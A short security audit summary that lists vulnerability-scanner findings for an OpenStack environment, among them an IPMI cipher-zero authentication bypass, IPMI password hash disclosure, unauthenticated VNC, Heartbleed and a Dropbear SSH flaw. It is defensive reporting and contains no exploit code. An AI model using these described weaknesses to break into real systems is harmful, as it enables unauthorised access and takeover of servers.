This week our Security Team have been doing a Security Audit on the dSN OpenStack environment. The first results have been quite disturbing: Critical Risk: • IPMI Cipher Suite Zero Authentication Bypass. The IPMI service listening on the remote system has cipher suite zero enabled, which permits logon as an administrator without requiring a password. Once logged in, a remote attacker may perform a variety of actions, including powering off the remote system. High Risk: - SNMP community “public” in several hosts. - IPMI v2.0 Password Hash Disclosure. The remote host supports IPMI v2.0. The Intelligent Platform Management Interface (IPMI) protocol is affected by an information disclosure vulnerability due to the support of RMCP+ Authenticated Key-Exchange Protocol (RAKP) authentication. A remote attacker can obtain password hash information for valid user accounts via the HMAC from a RAKP message 2 response from a BMC. - VNC Server Unauthenticated Access - OpenSSL 1.0.1 < 1.0.1g Multiple Vulnerabilities (Heartbleed and others) - Dropbear SSH Server Channel Concurrency Use-after-free Remote Code Execution The remote host is running a version of Dropbear SSH before 2012.55. As such, it reportedly contains a flaw that might allow an attacker to run arbitrary code on the remote host with root privileges if they are authenticated using a public key and command restriction is enforced. Medium Risk: - Vulnerabilities in SSL and TSL configuration (CRIME, BEAST, Poodle, Freak, Logjam) - Weak ciphers (RC4, Export ciphers) - TRACE method Enabled.